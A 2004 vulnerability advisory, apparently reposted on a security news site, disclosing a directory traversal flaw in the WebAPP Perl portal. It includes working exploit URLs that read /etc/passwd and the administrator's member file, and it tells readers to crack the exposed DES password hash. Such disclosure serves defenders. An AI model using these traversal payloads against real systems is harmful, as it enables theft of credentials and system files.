Risks
Vulnerabilities
Browse by
WebAPP Multiple Vulnerabilities
25 August 2004
Bookmark and Share
From: "Jérôme" ATHIAS <jerome.athias(At)caramail.com>

WebAPP is advertised as the internet's most feature rich, easy to run PERL based portal system. Its home site is at http://www.web-app.org/ Some features are :

-Easy to Install on standard Unix servers! (Windows user-supported only!)
-User Profiles
-Message forums
-Private messaging between members
-Blog-style News Articles
-Links and Downloads
-Customizable themes
-Multiple language support
-Flat-file System-NO SQL DATABASE!
-Membership controls
-Open source

Several user mods are also available which ranges from chat to e-commerce applications.

Several vulnerabilities in these mods have already been discovered.

The WebAPP system itself has a serious reverse directory traversal vulnerability.

Example..

1) Go to http://vulnerable-target.xxx/cgi-bin/index.cgi
/this is their main support site/

2) Click on Articles on the main menu at the left side of the screen

3) Click on any of the icons representing the misc topics available /i chose the "bugs" section/

4) You'll wind up with the url "http://vulnerable-target.xxx/cgi-bin/index.cgi?
action=topics&viewcat=bugs" on the address bar on your browser. Change it to
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics&viewcat=
../../../../../../../etc/passwd%00"

5)View the html source for the page

A more interesting file to look at would be;
"http://vulnerable-target.xxx/cgi-bin/index.cgi?action=topics
&viewcat=../../db/members/admin.dat%00"

View the html source code and scroll down until you come to the line with;
href="index.cgi?action=viewnews&amp;id=adUCOOzV2ljgg"></a></td>

"adUCOOzV2ljgg" is the hashed password of the Administrator.
It's standard DES encrypted so you can run a password cracking program to crack it

Every user would have a corresponding .dat file within the db/members directory

PhTeam Release

Greetz to PATz, Luvchr|s, Verum, Fed-X, rebarz99, hEps, ch1m3ra, and sa mga posers na kupal sa #oneball


Spotlight

Targeted attack protection via network topology alteration

Posted on 17 October 2014.  |  This article from Trend Micro tackles how network topology can aid in defending the enterprise network from risks posed by targeted attacks.


Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.
  



Daily digest

Receive a daily digest of the latest security news.
  

DON'T
MISS

Mon, Oct 20th
    COPYRIGHT 1998-2014 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //